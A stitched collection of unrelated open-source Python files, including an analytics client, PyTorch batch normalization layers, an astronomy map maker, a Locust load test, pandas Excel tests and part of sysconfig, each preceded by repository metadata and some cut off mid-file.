    setattr(this, '__HEADERS', headers)
def disable_token(platform, user_id, token, on_error=None, on_success=None):
    """ Disable a device token for a user.
    :param str platform: platform the token belongs to; one of
    outbound.GCM (Google Cloud Messaging) or outbound.APNS (Apple Push
    Notification Service).
    :param str | number user_id: the id you use to identify a user; should
    be static for the lifetime of a user.
    :param str token: the device token to disable.
    :param func on_error: optional callback taking (code, message), where
    code is one of outbound.ERROR_XXXXXX and message the corresponding text.
    :param func on_success: optional zero-argument callback invoked on success.
    """
    # Second argument False = disable (see register_token for the inverse).
    __device_token(platform, False, user_id, token, on_error, on_success)
def register_token(platform, user_id, token, on_error=None, on_success=None):
    """ Register a device token for a user.
    :param str platform: platform the token belongs to; one of
    outbound.GCM (Google Cloud Messaging) or outbound.APNS (Apple Push
    Notification Service).
    :param str | number user_id: the id you use to identify a user; should
    be static for the lifetime of a user.
    :param str token: the device token to register.
    :param func on_error: optional callback taking (code, message), where
    code is one of outbound.ERROR_XXXXXX and message the corresponding text.
    :param func on_success: optional zero-argument callback invoked on success.
    """
    # Second argument True = register (see disable_token for the inverse).
    __device_token(platform, True, user_id, token, on_error, on_success)
def identify(user_id, previous_id=None, group_id=None, group_attributes=None,
             first_name=None, last_name=None, email=None,
             phone_number=None, apns_tokens=None, gcm_tokens=None,
             attributes=None, on_error=None, on_success=None):
    """ Identifying a user creates a record of your user in Outbound. Identify
    calls should be made prior to sending any track events for a user.
    :param str | number user_id: the id you use to identify a user. this should
    be static for the lifetime of a user.
    :param str | number previous_id: OPTIONAL the id you previously used to identify the user.
    :param str | number group_id: OPTIONAL the id that identifies a group of users the current user
    belongs to.
    :param dict group_attributes: OPTIONAL An optional dictionary of attributes that are shared
    among the group this user belongs to.
    :param str first_name: OPTIONAL the user's first name.
    :param str last_name: OPTIONAL the user's last name.
    :param str email: OPTIONAL the user's email address.
    :param str phone_number: OPTIONAL the user's phone number.
    :param str | list apns_tokens: OPTIONAL the device tokens for the user's iOS
    devices. If a single string is given it is put into a list.
    :param str | list gcm_tokens: OPTIONAL the device tokens for the user's Android
    devices. If a single string is given it is put into a list.
    :param dict attributes: An optional dictionary with any additional freeform
    attributes describing the user.
    :param func on_error: An optional function to call in the event of an error.
    on_error callback should take 2 parameters: `code` and `error`. `code` will be
    one of outbound.ERROR_XXXXXX. `error` will be the corresponding message.
    :param func on_success: An optional function to call if/when the API call succeeds.
    on_success callback takes no parameters.
    """
    # Default callbacks are the module's private no-op/logging handlers.
    on_error = on_error or __on_error
    on_success = on_success or __on_success
    # init() must have stored the API headers on this module first.
    if not hasattr(this, '__HEADERS'):
        on_error(ERROR_INIT, __error_message(ERROR_INIT))
        return
    # NOTE: `basestring` makes this module Python 2 only.
    if not isinstance(user_id, (basestring, Number)):
        on_error(ERROR_USER_ID, __error_message(ERROR_USER_ID))
        return
    data = __user(
        first_name,
        last_name,
        email,
        phone_number,
        apns_tokens,
        gcm_tokens,
        attributes,
        previous_id,
        group_id,
        group_attributes,)
    data['user_id'] = user_id
    try:
        resp = requests.post(
            "%s/identify" % __BASE_URL,
            data=json.dumps(data),
            headers=getattr(this, '__HEADERS'),)
        # Any 2xx/3xx response counts as success.
        if resp.status_code >= 200 and resp.status_code < 400:
            on_success()
        else:
            on_error(ERROR_UNKNOWN, resp.text)
    except requests.exceptions.ConnectionError:
        on_error(ERROR_CONNECTION, __error_message(ERROR_CONNECTION))
def track(user_id, event, first_name=None, last_name=None, email=None,
phone_number=None, apns_tokens=None, gcm_tokens=None,
user_attributes=None, properties=None, on_error=None, on_success=None, timestamp=None):
""" For any event you want to track, when a user triggers that event you
would call this function.
You can do an identify and track call simultaneously by including all the
identifiable user information in the track call.
:param str | number user_id: the id you user who triggered the event.
:param str first_name: OPTIONAL the user's first name.
:param str last_name: OPTIONAL the user's last name.
:param str email: OPTIONAL the user's email address.
:param str phone_number: OPTIONAL the user's phone number.
:param str | list apns_tokens: OPTIONAL the device tokens for the user's iOS
devices. If a single string is given it is put into a list.
:param str | list gcm_tokens: OPTIONAL the device tokens for the user's Android
devices. If a single string is given it is put into a list.
:param dict user_attributes: An optional dictionary with any additional
freeform attributes describing the user.
:param dict properties: An optional dictionary with any properties that
describe the event being track. Example: if the event were "added item to
cart", you might include a properties named "item" that is the name
of the item added to the cart.
:param func on_error: An optional function to call in the event of an error.
on_error callback should take 1 parameter which will be the error messa | ge.
:param func on_success: An optional function to call if/when the API call succeeds.
on_success callback takes no parameters.
"""
on_error = on_error or __on_error
on_success = on_success or __on_success
if not hasattr(this, '__HEADERS'):
on_error(ERROR_INIT, __error_mess | age(ERROR_INIT))
return
if not isinstance(user_id, (basestring, Number)):
on_error(ERROR_USER_ID, __error_message(ERROR_USER_ID))
return
if not isinstance(event, basestring):
on_error(ERROR_EVENT_NAME, __error_message(ERROR_EVENT_NAME))
return
data = dict(user_id=user_id, event=event)
user = __user(
first_name,
last_name,
email,
phone_number,
apns_tokens,
gcm_tokens,
user_attributes,
None, None, None)
if user:
data['user'] = user
if properties:
if isinstance(properties, dict):
if len(properties) > 0:
data['properties'] = properties
else:
sys.stderr.write('Invalid event properties given. Expected dictionary. ' +
'Got %s' % type(properties).__name__)
if timestamp:
data['timestamp'] = timestamp
else:
data['tim |
RPGOne/Skynet | pytorch-master/torch/nn/modules/batchnorm.py | Python | bsd-3-clause | 6,848 | 0.00219 | import torch
from .module import Module
from torch.nn.parameter import Parameter
from .. import functional as F
# TODO: check contiguous in THNN
# TODO: use separate backend functions?
class _BatchNorm(Module):
    """Shared implementation for BatchNorm1d/2d/3d: parameters, running
    statistics, and the forward pass; subclasses only add the input-rank
    check in ``_check_input_dim``.
    """
    def __init__(self, num_features, eps=1e-5, momentum=0.1, affine=True):
        super(_BatchNorm, self).__init__()
        self.num_features = num_features
        self.affine = affine
        self.eps = eps
        self.momentum = momentum
        if self.affine:
            # Learnable per-channel scale (gamma) and shift (beta).
            self.weight = Parameter(torch.Tensor(num_features))
            self.bias = Parameter(torch.Tensor(num_features))
        else:
            # Register as None so state_dict/parameter listing stays consistent.
            self.register_parameter('weight', None)
            self.register_parameter('bias', None)
        # Running statistics are buffers: saved/restored but not optimized.
        self.register_buffer('running_mean', torch.zeros(num_features))
        self.register_buffer('running_var', torch.ones(num_features))
        self.reset_parameters()
    def reset_parameters(self):
        """Reset running statistics and re-initialize the affine parameters."""
        self.running_mean.zero_()
        self.running_var.fill_(1)
        if self.affine:
            self.weight.data.uniform_()
            self.bias.data.zero_()
    def _check_input_dim(self, input):
        # Channel dimension (dim 1) must match the tracked feature count.
        if input.size(1) != self.running_mean.nelement():
            raise ValueError('got {}-feature tensor, expected {}'
                             .format(input.size(1), self.num_features))
    def forward(self, input):
        self._check_input_dim(input)
        # self.training toggles batch statistics vs. running statistics.
        return F.batch_norm(
            input, self.running_mean, self.running_var, self.weight, self.bias,
            self.training, self.momentum, self.eps)
    def __repr__(self):
        return ('{name}({num_features}, eps={eps}, momentum={momentum},'
                ' affine={affine})'
                .format(name=self.__class__.__name__, **self.__dict__))
class BatchNorm1d(_BatchNorm):
    r"""Applies Batch Normalization over a 2d or 3d input that is seen as a mini-batch.
    .. math::
        y = \frac{x - mean[x]}{ \sqrt{Var[x]} + \epsilon} * gamma + beta
    The mean and standard-deviation are calculated per-dimension over
    the mini-batches and gamma and beta are learnable parameter vectors
    of size N (where N is the input size).
    During training, this layer keeps a running estimate of its computed mean
    and variance. The running sum is kept with a default momentum of 0.1.
    During evaluation, this running mean/variance is used for normalization.
    Args:
        num_features: num_features from an expected input of size `batch_size x num_features [x width]`
        eps: a value added to the denominator for numerical stability. Default: 1e-5
        momentum: the value used for the running_mean and running_var computation. Default: 0.1
        affine: a boolean value that when set to true, gives the layer learnable affine parameters.
    Shape:
        - Input: :math:`(N, C)` or :math:`(N, C, L)`
        - Output: :math:`(N, C)` or :math:`(N, C, L)` (same shape as input)
    Examples:
        >>> # With Learnable Parameters
        >>> m = nn.BatchNorm1d(100)
        >>> # Without Learnable Parameters
        >>> m = nn.BatchNorm1d(100, affine=False)
        >>> input = autograd.Variable(torch.randn(20, 100))
        >>> output = m(input)
    """
    def _check_input_dim(self, input):
        # Accept (N, C) or (N, C, L); the feature-count check lives in the
        # base class.
        if input.dim() != 2 and input.dim() != 3:
            raise ValueError('expected 2D or 3D input (got {}D input)'
                             .format(input.dim()))
        super(BatchNorm1d, self)._check_input_dim(input)
class BatchNorm2d(_BatchNorm):
    r"""Applies Batch Normalization over a 4d input that is seen as a mini-batch of 3d inputs
    .. math::
        y = \frac{x - mean[x]}{ \sqrt{Var[x]} + \epsilon} * gamma + beta
    The mean and standard-deviation are calculated per-dimension over
    the mini-batches and gamma and beta are learnable parameter vectors
    of size N (where N is the input size).
    During training, this layer keeps a running estimate of its computed mean
    and variance. The running sum is kept with a default momentum of 0.1.
    During evaluation, this running mean/variance is used for normalization.
    Args:
        num_features: num_features from an expected input of size batch_size x num_features x height x width
        eps: a value added to the denominator for numerical stability. Default: 1e-5
        momentum: the value used for the running_mean and running_var computation. Default: 0.1
        affine: a boolean value that when set to true, gives the layer learnable affine parameters.
    Shape:
        - Input: :math:`(N, C, H, W)`
        - Output: :math:`(N, C, H, W)` (same shape as input)
    Examples:
        >>> # With Learnable Parameters
        >>> m = nn.BatchNorm2d(100)
        >>> # Without Learnable Parameters
        >>> m = nn.BatchNorm2d(100, affine=False)
        >>> input = autograd.Variable(torch.randn(20, 100, 35, 45))
        >>> output = m(input)
    """
    def _check_input_dim(self, input):
        # Require (N, C, H, W); the feature-count check lives in the base class.
        if input.dim() != 4:
            raise ValueError('expected 4D input (got {}D input)'
                             .format(input.dim()))
        super(BatchNorm2d, self)._check_input_dim(input)
class BatchNorm3d(_BatchNorm):
    r"""Applies Batch Normalization over a 5d input that is seen as a mini-batch of 4d inputs
    .. math::
        y = \frac{x - mean[x]}{ \sqrt{Var[x]} + \epsilon} * gamma + beta
    The mean and standard-deviation are calculated per-dimension over
    the mini-batches and gamma and beta are learnable parameter vectors
    of size N (where N is the input size).
    During training, this layer keeps a running estimate of its computed mean
    and variance. The running sum is kept with a default momentum of 0.1.
    During evaluation, this running mean/variance is used for normalization.
    Args:
        num_features: num_features from an expected input of size batch_size x num_features x height x width
        eps: a value added to the denominator for numerical stability. Default: 1e-5
        momentum: the value used for the running_mean and running_var computation. Default: 0.1
        affine: a boolean value that when set to true, gives the layer learnable affine parameters.
    Shape:
        - Input: :math:`(N, C, D, H, W)`
        - Output: :math:`(N, C, D, H, W)` (same shape as input)
    Examples:
        >>> # With Learnable Parameters
        >>> m = nn.BatchNorm3d(100)
        >>> # Without Learnable Parameters
        >>> m = nn.BatchNorm3d(100, affine=False)
        >>> input = autograd.Variable(torch.randn(20, 100, 35, 45, 10))
        >>> output = m(input)
    """
    def _check_input_dim(self, input):
        # Require (N, C, D, H, W); the feature-count check lives in the base class.
        if input.dim() != 5:
            raise ValueError('expected 5D input (got {}D input)'
                             .format(input.dim()))
        super(BatchNorm3d, self)._check_input_dim(input)
|
emgirardin/compassion-modules | message_center_compassion/mappings/__init__.py | Python | agpl-3.0 | 467 | 0 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <ecino@compassion.ch>
#
# The licence is i | n the file __openerp__.py
#
############################################################## | ################
from . import base_mapping
from . import advanced_query_mapping
|
ewanbarr/UtmostFanbeamMapper | map_maker.py | Python | apache-2.0 | 4,128 | 0.018411 | from astropy.io import fits
from astropy.wcs import WCS
import numpy as np
class RADecMap(object):
def __init__(self,extent,nra,ndec):
"""
Container for equatorial maps.
extent: extent of map [ra0,ra1,dec0,dec1]
nra: sampling in ra
ndec: sampling in dec
"""
ra0,ra1,dec0,dec1 = extent
min_ra = min(ra0,ra1)
max_ra = max(ra0,ra1)
min_dec = min(dec0,dec1)
max_dec = max(dec0,dec1)
self.ras = np.linspace(max_ra,min_ra,nra)
self.decs = np.linspace(max_dec,min_dec,ndec)
self.delta_ra = self.ras[1] - self.ras[0]
self.delta_dec = self.decs[0] - self.decs[1]
self.map = np.zeros([ndec,nra],dtype='float32')
def to_fits(self,fname):
"""
Write map to fits file (hopefully in right order)
fname: name of output file
"""
deg = np.degrees
wcs = WCS(naxis=2)
wcs.wcs.crpix = [self.map.shape[1]/2, self.map.shape[0]/2]
wcs.wcs.cdelt = np.array([deg(self.delta_ra), deg(self.delta_dec)])
wcs.wcs.crval = [deg(self.ras[self.map.shape[1]/2]), deg(self.decs[self.map.shape[0]/2])]
wcs.wcs.ctype = ["RA---TAN", "DEC--TAN"]
header = wcs.to_header()
hdu = fits.PrimaryHDU(self.map)
hdu.header.update(header)
hdu.writeto(fname,clobber=True)
def max_pixel(self):
"""
Return location and coordinate of max pixel.
"""
max_dec_idx = self.map.max(axis=1).argmax()
max_ra_idx = self.map.max(axis=0).argmax()
return (max_ra_idx,max_dec_idx),(self.ras[max_ra_idx],self.decs[max_dec_idx])
def gaussian(x,mu,sig):
"""
Get the height of a normalised Gaussian
x: x-axis coordinate
mu: mean
sig: standard deviation
"""
return np.e**(-((x-mu)**2)/(2*sig**2))
def default_beam_model(ns_offsets):
"""
Return pixel weight based on offset from beam c | ent | re in NS axis.
ns_offsets: scalar or array of offsets
"""
fwhm = np.radians(2.0)
sigma = fwhm/2.355
return 1/gaussian(ns_offsets,0.0,sigma)
def fanbeam_model(ns_offsets,ew_offsets):
ns_fwhm = np.radians(2.0)
ns_sigma = ns_fwhm/2.355
ew_fwhm = np.radians(41/3600.0)
ew_sigma = ew_fwhm/2.355
return 1/(gaussian(ns_offsets,0.0,ns_sigma)*gaussian(ew_offsets,0.0,ew_sigma))
def make_map(fanbeams,
extent,
nra,
ndec,
beam_model=default_beam_model,
op=np.median,
cache = True
):
""" Make an equatorial map from a set of fanbeams.
fanbeams: An object of basetype FanBeamTimeMap
extent: the shape of the map [min RA, max RA, min Dec, max Dec]
nra: the sampling in RA
ndec: the sampling in Dec
beam_model: a function that takes an array of NS offsets and returns an array of weights
op: an operation to apply to the array of values extracted from the fanbeams
"""
#create output map
output = RADecMap(extent,nra,ndec)
#get all tracks and offsets
if cache:
tracks,offsets = fanbeams.radecs_to_tracks(output.ras,output.decs)
#loop over ra and dec values to populate map
for ii,ra in enumerate(output.ras):
print ii,"/",output.ras.size,"\r",
for jj,dec in enumerate(output.decs):
#extract a trail through fanbeam space
if cache:
trail,xcoords = fanbeams.extract(tracks[jj,ii],fanbeams._xcoords)
ns_offsets = offsets[jj,ii][xcoords]
else:
track,ns_offsets = fanbeams.radec_to_track(ra,dec)
trail,xcoords = fanbeams.extract(track,fanbeams._xcoords)
ns_offsets = ns_offsets[xcoords]
#inline background subtraction would happen here
if beam_model is not None:
#apply a weighting to the trail
trail *= beam_model(ns_offsets)
#apply op to the trail
output.map[jj,ii] = op(trail)
print
return output
|
dragoon/kilogram | kilogram/dataset/edit_histories/wikipedia/__init__.py | Python | apache-2.0 | 427 | 0 | import re
END_SENTENCE | _RE = re.compile(r'\s[.?!]\s(?=[^a-z])')
def line_filter(line):
sentences = END_SENTENCE_RE.split(line)
last = len(sentences) - 1
for i, sentence in enumerate(sentences):
if not sentence.strip():
continue
if i == last and not sentence.endswith('.'):
continue
if not sentence.endswith('.'):
| sentence += ' .'
yield sentence
|
GoogleCloudPlatform/cloud-opensource-python | compatibility_server/loadtest/locustfile.py | Python | apache-2.0 | 2,473 | 0 | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Perform a load test on the compatibility server. Usage:
$ pip install locustio
$ locust --host=http://104.197.8.72
"""
import random
import urllib.parse
import locust
PYTHON2_PACKAGES = [
'apache-beam[gcp]',
'google-cloud-bigtable',
'google-cloud-dns',
'google-cloud-vision',
'tensorboard',
'tensorflow',
]
PYTHON3_PACKAGES = [
'google-cloud-bigtable',
'google-cloud-dns',
'google-cloud-vision',
'tensorboard',
'tensorflow',
]
class CompatibilityCheck(locust.TaskSet):
@locust.task
def single_python2(self):
| query = urllib.parse.urlencode(
{'python-version': '2',
'package': random.choice(PYTHON2_PACKAGES)})
self.client.get('/?%s' % query)
@locust.task
def single_python3(self):
query = urllib.parse.urlencode(
{'python-version': '3',
'package': random.choice(PYTHON3_PACKAGES)})
self.client.get('/?%s' % query)
@locust.task
def d | ouble_python2(self):
package1 = random.choice(PYTHON2_PACKAGES)
package2 = random.choice(list(set(PYTHON2_PACKAGES) - {package1}))
query = urllib.parse.urlencode([('python-version', '2'),
('package', package1),
('package', package2)])
self.client.get('/?%s' % query)
@locust.task
def double_python3(self):
package1 = random.choice(PYTHON3_PACKAGES)
package2 = random.choice(list(set(PYTHON3_PACKAGES) - {package1}))
query = urllib.parse.urlencode([('python-version', '3'),
('package', package1),
('package', package2)])
self.client.get('/?%s' % query)
class CompatibilityChecker(locust.HttpLocust):
task_set = CompatibilityCheck
min_wait = 0
max_wait = 0
|
d1m0/browser_bench | build_worksheet.py | Python | mit | 4,846 | 0.026826 | #! /usr/bin/env python
import gspread
import argparse
from format import *
import sys
from stats import getMean
import pdb
import json
from oauth2client.client import SignedJwtAssertionCredentials
from gsheets import openSS, Table, putRawTable
p = argparse.ArgumentParser(description=\
"Given a set of runs for several browsers build a GoogleDocs spread sheet comparing the results")
p.add_argument('--key', type=str, help='Path to JSON key for Google Dev Project')
p.add_argument('--title', type=str, help='Title of an existing empty spreadsheet in which to work')
p.add_argument('results_file', type=str, help='File with raw results')
p.add_argument('--baseline', type=str, help='Label for the browser which should be considered baseline', required=False)
p.add_argument('--sheet', type=str, help='Worksheet name where we to put results', default='Sheet1', required=False)
args = p.parse_args()
baseline = args.baseline if 'baseline' in args else None
ss = openSS(args.key, args.title)
ws = ss.worksheet(args.sheet);
r = load(args.results_file)
# Put general info about the test at the top
putRawTable(ws, 1, 1, [ [ 'CPU:', cpuInfoStr(r)], \
['Arch:', arch(r)], \
['Ram:', str(ram(r)) + 'MB'],\
['OS:', os(r)], \
['Date:', time(r)] ])
def isRectangular(tbl):
return len(set([len(x) for x in tbl])) == 1
def meansCol(col):
bench = col_benchmark(col)
return [getMean(x, bench) for x in col_scores(col)]
def transpose(m):
t = [[None for i in xrange(0, len(m))] for j in xrange(0, len(m[0]))]
for i in xrange(0, len(m)):
for j in xrange(0, len(m[i])):
t[j][i] = m[i][j]
return t
def buildResultsTable(ws, startRow, startCol, r):
nruns = len(col_scores(cols(r)[0]))
resCols = [[col_label(x), col_benchmark(x)] + meansCol(x) for x in cols(r)]
def cname(col): return str(col[1]) + ',' + str(col[0])
# Furthermore we impose an ordering for neatness, and remember where vanilla values are
def sortF(c1, c2):
bench1 = col_benchmark(c1)
bench2 = col_benchmark(c2)
if (bench1 == bench2):
lbl1 = col_label(c1)
lbl2 = col_label(c2)
if (lbl1 == lbl2):
return 0
elif lbl1 == 'vanilla':
return -1
elif lbl2 == 'vanilla':
return 1
else: return cmp(lbl1, lbl2)
else:
return cmp(bench1, bench2)
resCols.sort(cmp=sortF)
if (baseline):
rowNames = range(1, 1 + nruns) + [ 'Mean' ,'Std. Dev.', 'Std. Dev. (%)', 'Mean Overhead (%)', 'Overhead Std. Dev. (%)' ]
else:
rowNames = range(1, 1 + nruns) + [ 'Mean' ,'Std. Dev.', 'Std. Dev. (%)' ]
colNames = [cname(c) for c in resCols]
resTbl = Table(startRow, startCol, rowNames, colNames, ws)
meanRow = ['=average({0}:{1})'.format(resTbl.cellLbl(1, colNames[i]), resTbl.cellLbl(nruns, colNames[i])) for i in xrange(0, len(colNames))]
stdevRow = ['=stdev({0}:{1})'.format(resTbl.cellLbl(1, colNames[i]), resTbl.cellLbl(nruns, colNames[i])) for i in xrange(0, len(colNames))]
stdevRowPer = ['={0} * 100.0 / {1}'.format(\
resTbl.cellLbl('Std. Dev.', colNames[i]),
resTbl.cellLbl('Mean', colNames[i]))
for i in xrange(0, le | n(colNames))]
if (baseline):
meanOverPerRow = [('=({0}-{1})*100.0/{1}' if col_benchmark(c) != 'octane' else '=({1}-{0})*100.0/{1}').format(\
resTbl.cellLbl('Mean', cname(c)), \
resTbl.cellLbl('Mean', col_ben | chmark(c) + ',' + baseline)) \
for c in resCols]
stdevOverPerRow = ['=sqrt({0}*{0}+{1}*{1})*100.0/{2}'.format(\
resTbl.cellLbl('Std. Dev.', cname(c)),
resTbl.cellLbl('Std. Dev.', col_benchmark(c) + ',' + baseline),
resTbl.cellLbl('Mean', col_benchmark(c) + ',' + baseline))
for c in resCols]
if (baseline):
contents = transpose([x[2:] for x in resCols]) + \
[ meanRow, stdevRow, stdevRowPer, meanOverPerRow, stdevOverPerRow ]
else:
contents = transpose([x[2:] for x in resCols]) + \
[ meanRow, stdevRow, stdevRowPer ]
assert isRectangular(contents)
resTbl.setContents(contents)
return resTbl
def buildSummaryTable(ws, startRow, startCol, resTbl, r):
benchmarks = list(set([col_benchmark(x) for x in cols(r)]))
browsers = list(set([col_label(x) for x in cols(r)]))
sumTbl = Table(startRow, startCol, browsers, benchmarks + [ 'Average' ], ws)
contents = [\
['=' + resTbl.cellLbl('Mean Overhead (%)', benchmark + ',' + str(browser)) \
for benchmark in benchmarks] + \
['=average({0}:{1})'.format(sumTbl.cellLbl(browser, benchmarks[0]),
sumTbl.cellLbl(browser, benchmarks[-1]))] \
for browser in browsers]
sumTbl.setContents(contents)
return sumTbl
print "Building Results table"
resTbl = buildResultsTable(ws, 7,1, r)
resTbl.put()
if (baseline):
print "Building Summary of the Overhead table"
sumTbl = buildSummaryTable(ws, 8 + resTbl.height(), 1, resTbl, r)
sumTbl.put()
|
cbertinato/pandas | pandas/tests/io/excel/test_writers.py | Python | bsd-3-clause | 47,648 | 0.000021 | from datetime import date, datetime, timedelta
from functools import partial
from io import BytesIO
import os
import numpy as np
from numpy import nan
import pytest
from pandas.compat import PY36
import pandas.util._test_decorators as td
import pandas as pd
from pandas import DataFrame, Index, MultiIndex, get_option, set_option
import pandas.util.testing as tm
from pandas.util.testing import ensure_clean, makeCustomDataframe as mkdf
from pandas.io.excel import (
ExcelFile, ExcelWriter, _OpenpyxlWriter, _XlsxWriter, _XlwtWriter,
register_writer)
@td.skip_if_no('xlrd')
@pytest.mark.parametrize( | "ext", ['.xls', '.xlsx', '.xlsm'])
class TestRoundTrip:
@td.skip_if_no("xlwt")
@td.skip_if_no("openpyxl")
@pytest.mark.parametrize("header,expected", [
(None, DataFrame([np.nan] | * 4)),
(0, DataFrame({"Unnamed: 0": [np.nan] * 3}))
])
def test_read_one_empty_col_no_header(self, ext, header, expected):
# xref gh-12292
filename = "no_header"
df = pd.DataFrame(
[["", 1, 100],
["", 2, 200],
["", 3, 300],
["", 4, 400]]
)
with ensure_clean(ext) as path:
df.to_excel(path, filename, index=False, header=False)
result = pd.read_excel(path, filename, usecols=[0], header=header)
tm.assert_frame_equal(result, expected)
@td.skip_if_no("xlwt")
@td.skip_if_no("openpyxl")
@pytest.mark.parametrize("header,expected", [
(None, DataFrame([0] + [np.nan] * 4)),
(0, DataFrame([np.nan] * 4))
])
def test_read_one_empty_col_with_header(self, ext, header, expected):
filename = "with_header"
df = pd.DataFrame(
[["", 1, 100],
["", 2, 200],
["", 3, 300],
["", 4, 400]]
)
with ensure_clean(ext) as path:
df.to_excel(path, 'with_header', index=False, header=True)
result = pd.read_excel(path, filename, usecols=[0], header=header)
tm.assert_frame_equal(result, expected)
@td.skip_if_no('openpyxl')
@td.skip_if_no('xlwt')
def test_set_column_names_in_parameter(self, ext):
# GH 12870 : pass down column names associated with
# keyword argument names
refdf = pd.DataFrame([[1, 'foo'], [2, 'bar'],
[3, 'baz']], columns=['a', 'b'])
with ensure_clean(ext) as pth:
with ExcelWriter(pth) as writer:
refdf.to_excel(writer, 'Data_no_head',
header=False, index=False)
refdf.to_excel(writer, 'Data_with_head', index=False)
refdf.columns = ['A', 'B']
with ExcelFile(pth) as reader:
xlsdf_no_head = pd.read_excel(reader, 'Data_no_head',
header=None, names=['A', 'B'])
xlsdf_with_head = pd.read_excel(
reader, 'Data_with_head', index_col=None, names=['A', 'B'])
tm.assert_frame_equal(xlsdf_no_head, refdf)
tm.assert_frame_equal(xlsdf_with_head, refdf)
@td.skip_if_no("xlwt")
@td.skip_if_no("openpyxl")
def test_creating_and_reading_multiple_sheets(self, ext):
# see gh-9450
#
# Test reading multiple sheets, from a runtime
# created Excel file with multiple sheets.
def tdf(col_sheet_name):
d, i = [11, 22, 33], [1, 2, 3]
return DataFrame(d, i, columns=[col_sheet_name])
sheets = ["AAA", "BBB", "CCC"]
dfs = [tdf(s) for s in sheets]
dfs = dict(zip(sheets, dfs))
with ensure_clean(ext) as pth:
with ExcelWriter(pth) as ew:
for sheetname, df in dfs.items():
df.to_excel(ew, sheetname)
dfs_returned = pd.read_excel(pth, sheet_name=sheets, index_col=0)
for s in sheets:
tm.assert_frame_equal(dfs[s], dfs_returned[s])
@td.skip_if_no("xlsxwriter")
def test_read_excel_multiindex_empty_level(self, ext):
# see gh-12453
with ensure_clean(ext) as path:
df = DataFrame({
("One", "x"): {0: 1},
("Two", "X"): {0: 3},
("Two", "Y"): {0: 7},
("Zero", ""): {0: 0}
})
expected = DataFrame({
("One", "x"): {0: 1},
("Two", "X"): {0: 3},
("Two", "Y"): {0: 7},
("Zero", "Unnamed: 4_level_1"): {0: 0}
})
df.to_excel(path)
actual = pd.read_excel(path, header=[0, 1], index_col=0)
tm.assert_frame_equal(actual, expected)
df = pd.DataFrame({
("Beg", ""): {0: 0},
("Middle", "x"): {0: 1},
("Tail", "X"): {0: 3},
("Tail", "Y"): {0: 7}
})
expected = pd.DataFrame({
("Beg", "Unnamed: 1_level_1"): {0: 0},
("Middle", "x"): {0: 1},
("Tail", "X"): {0: 3},
("Tail", "Y"): {0: 7}
})
df.to_excel(path)
actual = pd.read_excel(path, header=[0, 1], index_col=0)
tm.assert_frame_equal(actual, expected)
@td.skip_if_no("xlsxwriter")
@pytest.mark.parametrize("c_idx_names", [True, False])
@pytest.mark.parametrize("r_idx_names", [True, False])
@pytest.mark.parametrize("c_idx_levels", [1, 3])
@pytest.mark.parametrize("r_idx_levels", [1, 3])
def test_excel_multindex_roundtrip(self, ext, c_idx_names, r_idx_names,
c_idx_levels, r_idx_levels):
# see gh-4679
with ensure_clean(ext) as pth:
if c_idx_levels == 1 and c_idx_names:
pytest.skip("Column index name cannot be "
"serialized unless it's a MultiIndex")
# Empty name case current read in as
# unnamed levels, not Nones.
check_names = r_idx_names or r_idx_levels <= 1
df = mkdf(5, 5, c_idx_names, r_idx_names,
c_idx_levels, r_idx_levels)
df.to_excel(pth)
act = pd.read_excel(pth, index_col=list(range(r_idx_levels)),
header=list(range(c_idx_levels)))
tm.assert_frame_equal(df, act, check_names=check_names)
df.iloc[0, :] = np.nan
df.to_excel(pth)
act = pd.read_excel(pth, index_col=list(range(r_idx_levels)),
header=list(range(c_idx_levels)))
tm.assert_frame_equal(df, act, check_names=check_names)
df.iloc[-1, :] = np.nan
df.to_excel(pth)
act = pd.read_excel(pth, index_col=list(range(r_idx_levels)),
header=list(range(c_idx_levels)))
tm.assert_frame_equal(df, act, check_names=check_names)
@td.skip_if_no("xlwt")
@td.skip_if_no("openpyxl")
def test_read_excel_parse_dates(self, ext):
# see gh-11544, gh-12051
df = DataFrame(
{"col": [1, 2, 3],
"date_strings": pd.date_range("2012-01-01", periods=3)})
df2 = df.copy()
df2["date_strings"] = df2["date_strings"].dt.strftime("%m/%d/%Y")
with ensure_clean(ext) as pth:
df2.to_excel(pth)
res = pd.read_excel(pth, index_col=0)
tm.assert_frame_equal(df2, res)
res = pd.read_excel(pth, parse_dates=["date_strings"], index_col=0)
tm.assert_frame_equal(df, res)
date_parser = lambda x: pd.datetime.strptime(x, "%m/%d/%Y")
res = pd.read_excel(pth, parse_dates=["date_strings"],
date_parser=date_parser, index_col=0)
tm.assert_frame_equal(df, res)
class _WriterBase:
@pytest.fixture(autouse=True)
def set_engine_and_path(self, request, engine, ext):
"""Fixture to set engine and open file for use in each test case
Rather than requiring `engine=...` to be provided explicitly as an
argument in |
nmercier/linux-cross-gcc | win32/bin/Lib/sysconfig.py | Python | bsd-3-clause | 23,180 | 0.001726 | """Provide access to Python's configuration information.
"""
import sys
import os
from os.path import pardir, realpath
_INSTALL_SCHEMES = {
'posix_prefix': {
'stdlib': '{base}/lib/python{py_version_short}',
'platstdlib': '{platbase}/lib/python{py_version_short}',
'purelib': '{base}/lib/python{py_version_short}/site-packages',
'platlib': '{platbase}/lib/python{py_version_short}/site-packages',
'include': '{base}/include/python{py_version_short}',
'platinclude': '{platbase}/include/python{py_version_short}',
'scripts': '{base}/bin',
'data': '{base}',
},
'posix_home': {
'stdlib': '{base}/lib/python',
'platstdlib': '{base}/lib/python',
'purelib': '{base}/lib/python',
'platlib': '{base}/lib/python',
| 'include': '{base}/include/python',
'platinclude': '{base}/include/python',
'scripts': '{base}/bin',
'data' : '{base}',
},
'nt': {
'stdlib': '{base}/Lib',
'platstdlib': '{base}/Lib',
'purelib': '{base}/Lib/site-packages',
'platlib': '{base}/Lib/site-packages',
'include': '{base}/Include',
'platinclude': '{base}/Include',
'scripts': '{base}/Scripts',
| 'data' : '{base}',
},
'os2': {
'stdlib': '{base}/Lib',
'platstdlib': '{base}/Lib',
'purelib': '{base}/Lib/site-packages',
'platlib': '{base}/Lib/site-packages',
'include': '{base}/Include',
